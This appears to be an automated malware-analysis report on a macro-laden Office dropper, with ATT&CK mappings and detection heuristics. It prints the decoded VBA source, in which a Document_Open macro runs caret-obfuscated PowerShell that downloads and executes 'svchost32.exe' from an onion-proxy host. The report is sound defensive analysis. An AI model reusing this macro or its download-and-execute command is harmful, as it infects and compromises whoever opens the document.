MALICIOUS
250
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1059.003 Windows Command Shell
T1105 Ingress Tool Transfer
The sample is a malicious Office document containing VBA macros. The Document_Open macro is designed to execute a command that downloads a second-stage executable from the URL 'https://pvjk6aukijrdwqwqs.onion.to/svchost32.exe' and saves it to a path constructed from concatenated strings. The document body explicitly instructs the user to enable macros, which is a common lure for macro-based malware.
Heuristics 8
-
ClamAV: Doc.Dropper.Agent-1844349 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-1844349
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Shell ("cmd.exe /c " + akj + " -no^pr^o^file -wi^ndo^wstyle h^idd^en (Ne^w-Obj^ect Sy^stem^.Net.We^bC^lie^nt).Do^wnl^oadFi^le('ht^tp^s://pvj^k6a^ukij^rdw^wq^s.on^i^on.t^o/sv^ch^os^t^32.e^x^e','" + bfd + "&s" + bf + "& exit") End Sub -
cmd.exe reference in VBA high OLE_VBA_CMDcmd.exe reference in VBAMatched line in script
Shell ("cmd.exe /c " + akj + " -no^pr^o^file -wi^ndo^wstyle h^idd^en (Ne^w-Obj^ect Sy^stem^.Net.We^bC^lie^nt).Do^wnl^oadFi^le('ht^tp^s://pvj^k6a^ukij^rdw^wq^s.on^i^on.t^o/sv^ch^os^t^32.e^x^e','" + bfd + "&s" + bf + "& exit") End Sub -
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Attribute VB_Customizable = True Private Sub Document_Open() -
Suspicious cmd.exe invocation with execution flag high SC_STR_CMDSuspicious cmd.exe invocation with execution flag
-
Macro/content-enable lure medium SE_ENABLE_LUREDocument instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1068 bytes |
SHA-256: 45807028f9261b258f4b6e13e319faec0f74ca395555cae538a07c3b16402966 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
akj = iffcdbg.TextBox1.Text
bf = iffcdbg.TextBox2.Text
bfd = iffcdbg.TextBox3.Text
Shell ("cmd.exe /c " + akj + " -no^pr^o^file -wi^ndo^wstyle h^idd^en (Ne^w-Obj^ect Sy^stem^.Net.We^bC^lie^nt).Do^wnl^oadFi^le('ht^tp^s://pvj^k6a^ukij^rdw^wq^s.on^i^on.t^o/sv^ch^os^t^32.e^x^e','" + bfd + "&s" + bf + "& exit")
End Sub
Attribute VB_Name = "iffcdbg"
Attribute VB_Base = "0{D9A0755E-7816-40F6-A65A-7B08B423D857}{6B647C3D-894A-442E-9360-12BF5F03E3C7}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub Label1_Click()
End Sub
Private Sub TextBox2_Change()
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.